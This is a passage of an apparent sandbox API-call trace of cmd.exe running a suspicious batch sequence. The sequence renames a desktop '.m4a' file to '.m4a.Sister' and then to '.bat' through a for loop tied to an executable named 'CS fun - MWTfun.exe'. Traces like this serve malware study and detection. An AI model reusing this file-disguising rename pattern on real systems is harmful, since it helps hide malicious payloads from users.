ftCreationTime.dwHighDateTime=0x1d5ee21, ftLastAccessTime.dwLowDateTime=0xbb227000, ftLastAccessTime.dwHighDateTime=0x1d5e1ee, ftLastWriteTime.dwLowDateTime=0xbb227000, ftLastWriteTime.dwHighDateTime=0x1d5e1ee, nFileSizeHigh=0x0, nFileSizeLow=0x1395e, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="6uAkPGvRw81680a_RZ.m4a", cAlternateFileName="")) returned 1 [0140.970] GetProcessHeap () returned 0x21ed8c70000 [0140.970] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cddee0, Size=0x144) returned 0x21ed92c1050 [0140.970] GetProcessHeap () returned 0x21ed8c70000 [0140.970] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92c1050) returned 0x144 [0140.970] GetProcessHeap () returned 0x21ed8c70000 [0140.970] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d59cc0 [0140.970] GetProcessHeap () returned 0x21ed8c70000 [0140.970] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d59cc0, Size=0x30) returned 0x21ed8d59cc0 [0140.970] GetProcessHeap () returned 0x21ed8c70000 [0140.970] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d59cc0) returned 0x30 [0140.970] GetProcessHeap () returned 0x21ed8c70000 [0140.970] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d59d00 [0140.970] malloc (_Size=0x1ff9c) returned 0x21ed90dffc0 [0140.973] GetProcessHeap () returned 0x21ed8c70000 [0140.973] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3e) returned 0x21ed8c7bc10 [0140.973] ??_V@YAXPEAX@Z () returned 0x1 [0140.975] GetProcessHeap () returned 0x21ed8c70000 [0140.975] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d59d00, Size=0x1e0) returned 0x21ed8d59d00 [0140.975] GetProcessHeap () returned 0x21ed8c70000 [0140.975] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d59d00) returned 0x1e0 [0140.976] GetProcessHeap () returned 0x21ed8c70000 [0140.976] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d59ef0 [0140.976] GetProcessHeap () returned 0x21ed8c70000 [0140.976] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d59ef0, Size=0x290) returned 0x21ed8d59ef0 [0140.976] GetProcessHeap () returned 0x21ed8c70000 [0140.976] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d59ef0) returned 0x290 [0140.976] GetProcessHeap () returned 0x21ed8c70000 [0140.976] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d5a190 [0140.976] GetProcessHeap () returned 0x21ed8c70000 [0140.976] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5a190, Size=0x30) returned 0x21ed8d5a190 [0140.976] GetProcessHeap () returned 0x21ed8c70000 [0140.976] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d5a190) returned 0x30 [0140.976] GetProcessHeap () returned 0x21ed8c70000 [0140.976] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d5a1d0 [0140.976] malloc (_Size=0x1ff9c) returned 0x21ed90dffc0 [0140.979] GetProcessHeap () returned 0x21ed8c70000 [0140.979] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3e) returned 0x21ed8c7ba80 [0140.979] ??_V@YAXPEAX@Z () returned 0x1 [0140.982] malloc (_Size=0x1ff9c) returned 0x21ed90dffc0 [0140.985] GetFullPathNameW (in: lpFileName="6uAkPGvRw81680a_RZ.m4a", nBufferLength=0xffce, lpBuffer=0x21ed90dffc0, lpFilePart=0xa6cf4fe1c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\6uAkPGvRw81680a_RZ.m4a", lpFilePart=0xa6cf4fe1c8*="6uAkPGvRw81680a_RZ.m4a") returned 0x2e [0140.985] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d42f70 [0140.986] FindClose (in: hFindFile=0x21ed8d42f70 | out: hFindFile=0x21ed8d42f70) returned 1 [0140.986] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d43690 [0140.986] FindClose (in: hFindFile=0x21ed8d43690 | out: hFindFile=0x21ed8d43690) returned 1 [0140.986] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7e760687, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x7e760687, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d43570 [0140.986] FindClose (in: hFindFile=0x21ed8d43570 | out: hFindFile=0x21ed8d43570) returned 1 [0140.986] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\6uAkPGvRw81680a_RZ.m4a", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x391bc3b0, ftCreationTime.dwHighDateTime=0x1d5ee21, ftLastAccessTime.dwLowDateTime=0xbb227000, ftLastAccessTime.dwHighDateTime=0x1d5e1ee, ftLastWriteTime.dwLowDateTime=0xbb227000, ftLastWriteTime.dwHighDateTime=0x1d5e1ee, nFileSizeHigh=0x0, nFileSizeLow=0x1395e, dwReserved0=0x4, dwReserved1=0x80, cFileName="6uAkPGvRw81680a_RZ.m4a", cAlternateFileName="6UAKPG~1.M4A")) returned 0x21ed8d43090 [0140.987] FindClose (in: hFindFile=0x21ed8d43090 | out: hFindFile=0x21ed8d43090) returned 1 [0140.987] _wcsnicmp (_String1="6UAKPG~1.M4A", _String2="6uAkPGvRw81680a_RZ.m4a", _MaxCount=0x16) returned 8 [0140.987] malloc (_Size=0x1ff9c) returned 0x21ed90fff70 [0140.988] ??_V@YAXPEAX@Z () returned 0x21ed90fff70 [0140.989] GetProcessHeap () returned 0x21ed8c70000 [0140.989] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8cc8750 [0140.989] ??_V@YAXPEAX@Z () returned 0x1 [0140.989] ??_V@YAXPEAX@Z () returned 0x1 [0140.990] GetProcessHeap () returned 0x21ed8c70000 [0140.990] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5a1d0, Size=0x1e0) returned 0x21ed8d5a1d0 [0140.990] GetProcessHeap () returned 0x21ed8c70000 [0140.991] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d5a1d0) returned 0x1e0 [0140.991] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0140.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.991] GetFileType (hFile=0x50) returned 0x2 [0140.991] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0140.991] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0140.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.994] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0141.033] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0141.033] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0141.034] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0141.034] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.034] GetFileType (hFile=0x50) returned 0x2 [0141.034] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0141.034] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0141.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.055] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0141.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.064] GetFileType (hFile=0x50) returned 0x2 [0141.064] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0141.064] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0141.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.068] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d59cd0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d59cd0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0141.070] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"6uAkPGvRw81680a_RZ.m4a\" \"6uAkPGvRw81680a_RZ.m4a.Sister\" ") returned 58 [0141.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.070] GetFileType (hFile=0x50) returned 0x2 [0141.070] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0141.070] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0141.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.080] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3a) returned 1 [0141.154] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0141.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.154] GetFileType (hFile=0x50) returned 0x2 [0141.154] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0141.154] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0141.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.158] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0141.182] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0141.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.183] GetFileType (hFile=0x50) returned 0x2 [0141.183] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0141.183] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0141.205] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.205] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0141.220] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0141.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.221] GetFileType (hFile=0x50) returned 0x2 [0141.221] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0141.221] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0141.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.230] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0141.235] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0141.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.235] GetFileType (hFile=0x50) returned 0x2 [0141.235] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0141.235] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0141.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.237] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0141.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.266] GetFileType (hFile=0x50) returned 0x2 [0141.267] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0141.267] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0141.323] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.323] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d5a1a0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d5a1a0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0141.334] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"6uAkPGvRw81680a_RZ.m4a.Sister\" \"6uAkPGvRw81680a_RZ.bat\" ") returned 58 [0141.335] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.335] GetFileType (hFile=0x50) returned 0x2 [0141.335] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0141.335] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0141.339] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.339] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3a) returned 1 [0141.348] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0141.348] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.348] GetFileType (hFile=0x50) returned 0x2 [0141.348] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0141.348] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0141.353] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.353] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0141.361] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0141.371] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0141.371] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0141.372] malloc (_Size=0xffce) returned 0x21ed90dffc0 [0141.373] ??_V@YAXPEAX@Z () returned 0x21ed90dffc0 [0141.374] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0141.374] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0141.374] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0141.374] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0141.374] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0141.374] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0141.374] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0141.374] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0141.374] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0141.374] ??_V@YAXPEAX@Z () returned 0x1 [0141.374] GetProcessHeap () returned 0x21ed8c70000 [0141.374] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xf8) returned 0x21ed8cddee0 [0141.374] GetProcessHeap () returned 0x21ed8c70000 [0141.374] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cddee0, Size=0x84) returned 0x21ed8cddee0 [0141.374] GetProcessHeap () returned 0x21ed8c70000 [0141.374] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cddee0) returned 0x84 [0141.374] GetProcessHeap () returned 0x21ed8c70000 [0141.374] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x8c) returned 0x21ed8cde440 [0141.374] GetProcessHeap () returned 0x21ed8c70000 [0141.374] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xf8) returned 0x21ed92c11a0 [0141.375] GetProcessHeap () returned 0x21ed8c70000 [0141.375] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92c11a0, Size=0x84) returned 0x21ed92c11a0 [0141.375] GetProcessHeap () returned 0x21ed8c70000 [0141.375] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92c11a0) returned 0x84 [0141.375] malloc (_Size=0xffce) returned 0x21ed90dffc0 [0141.375] ??_V@YAXPEAX@Z () returned 0x21ed90dffc0 [0141.375] GetProcessHeap () returned 0x21ed8c70000 [0141.375] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d431b0 [0141.375] GetProcessHeap () returned 0x21ed8c70000 [0141.375] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d31030 [0141.375] _wcsicmp (_String1="6uAkPGvRw81680a_RZ.m4a", _String2=".") returned 8 [0141.375] _wcsicmp (_String1="6uAkPGvRw81680a_RZ.m4a", _String2="..") returned 8 [0141.375] GetFileAttributesW (lpFileName="6uAkPGvRw81680a_RZ.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\6uakpgvrw81680a_rz.m4a")) returned 0x20 [0141.375] GetProcessHeap () returned 0x21ed8c70000 [0141.375] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed92c1240 [0141.377] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed92c1250 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0141.377] SetErrorMode (uMode=0x0) returned 0x0 [0141.377] SetErrorMode (uMode=0x1) returned 0x0 [0141.377] GetFullPathNameW (in: lpFileName="6uAkPGvRw81680a_RZ.m4a", nBufferLength=0x7fe7, lpBuffer=0x21ed90dffc0, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\6uAkPGvRw81680a_RZ.m4a", lpFilePart=0xa6cf4fd660*="6uAkPGvRw81680a_RZ.m4a") returned 0x2e [0141.378] SetErrorMode (uMode=0x0) returned 0x1 [0141.378] GetProcessHeap () returned 0x21ed8c70000 [0141.378] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5d260 [0141.378] _wcsicmp (_String1="6uAkPGvRw81680a_RZ.m4a", _String2=".") returned 8 [0141.378] _wcsicmp (_String1="6uAkPGvRw81680a_RZ.m4a", _String2="..") returned 8 [0141.378] GetFileAttributesW (lpFileName="6uAkPGvRw81680a_RZ.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\6uakpgvrw81680a_rz.m4a")) returned 0x20 [0141.378] ??_V@YAXPEAX@Z () returned 0x1 [0141.378] malloc (_Size=0xffce) returned 0x21ed90dffc0 [0141.378] ??_V@YAXPEAX@Z () returned 0x21ed90dffc0 [0141.378] malloc (_Size=0xffce) returned 0x21ed90effa0 [0141.378] ??_V@YAXPEAX@Z () returned 0x21ed90effa0 [0141.379] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\6uAkPGvRw81680a_RZ.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\6uakpgvrw81680a_rz.m4a")) returned 0x20 [0141.379] malloc (_Size=0xffce) returned 0x21ed90fff80 [0141.379] ??_V@YAXPEAX@Z () returned 0x21ed90fff80 [0141.380] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\6uAkPGvRw81680a_RZ.m4a", fInfoLevelId=0x1, lpFindFileData=0x21ed8d31040, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d31040) returned 0x21ed8d43330 [0141.380] malloc (_Size=0xffce) returned 0x21ed910ff60 [0141.381] ??_V@YAXPEAX@Z () returned 0x21ed910ff60 [0141.382] ??_V@YAXPEAX@Z () returned 0x1 [0141.382] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\6uAkPGvRw81680a_RZ.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\6uakpgvrw81680a_rz.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\6uAkPGvRw81680a_RZ.m4a.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\6uakpgvrw81680a_rz.m4a.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0141.384] FindNextFileW (in: hFindFile=0x21ed8d43330, lpFindFileData=0x21ed8d31040 | out: lpFindFileData=0x21ed8d31040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x391bc3b0, ftCreationTime.dwHighDateTime=0x1d5ee21, ftLastAccessTime.dwLowDateTime=0xbb227000, ftLastAccessTime.dwHighDateTime=0x1d5e1ee, ftLastWriteTime.dwLowDateTime=0xbb227000, ftLastWriteTime.dwHighDateTime=0x1d5e1ee, nFileSizeHigh=0x0, nFileSizeLow=0x1395e, dwReserved0=0x0, dwReserved1=0x0, cFileName="6uAkPGvRw81680a_RZ.m4a", cAlternateFileName="")) returned 0 [0141.386] GetLastError () returned 0x12 [0141.386] FindClose (in: hFindFile=0x21ed8d43330 | out: hFindFile=0x21ed8d43330) returned 1 [0141.386] ??_V@YAXPEAX@Z () returned 0x1 [0141.386] ??_V@YAXPEAX@Z () returned 0x1 [0141.387] ??_V@YAXPEAX@Z () returned 0x1 [0141.388] ??_V@YAXPEAX@Z () returned 0x1 [0141.388] GetProcessHeap () returned 0x21ed8c70000 [0141.388] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d430f0 [0141.388] GetProcessHeap () returned 0x21ed8c70000 [0141.388] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c959a0, Size=0x16) returned 0x21ed8c95960 [0141.388] GetProcessHeap () returned 0x21ed8c70000 [0141.388] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95960) returned 0x16 [0141.389] GetProcessHeap () returned 0x21ed8c70000 [0141.389] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0141.389] GetProcessHeap () returned 0x21ed8c70000 [0141.389] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0141.389] GetProcessHeap () returned 0x21ed8c70000 [0141.389] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d43c50 [0141.389] GetProcessHeap () returned 0x21ed8c70000 [0141.389] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d43c50, Size=0xb2) returned 0x21ed8d43c50 [0141.389] GetProcessHeap () returned 0x21ed8c70000 [0141.389] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d43c50) returned 0xb2 [0141.389] GetProcessHeap () returned 0x21ed8c70000 [0141.389] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d5e3d0 [0141.389] GetProcessHeap () returned 0x21ed8c70000 [0141.389] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5e3d0, Size=0x30) returned 0x21ed8d5e3d0 [0141.389] GetProcessHeap () returned 0x21ed8c70000 [0141.389] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d5e3d0) returned 0x30 [0141.389] GetProcessHeap () returned 0x21ed8c70000 [0141.389] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d5e410 [0141.390] malloc (_Size=0x1ff9c) returned 0x21ed90dffc0 [0141.393] GetProcessHeap () returned 0x21ed8c70000 [0141.393] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d47990 [0141.393] GetProcessHeap () returned 0x21ed8c70000 [0141.393] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed8d472d0 [0141.393] ??_V@YAXPEAX@Z () returned 0x1 [0141.396] malloc (_Size=0x1ff9c) returned 0x21ed90dffc0 [0141.404] GetProcessHeap () returned 0x21ed8c70000 [0141.404] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d46b50 [0141.404] GetFullPathNameW (in: 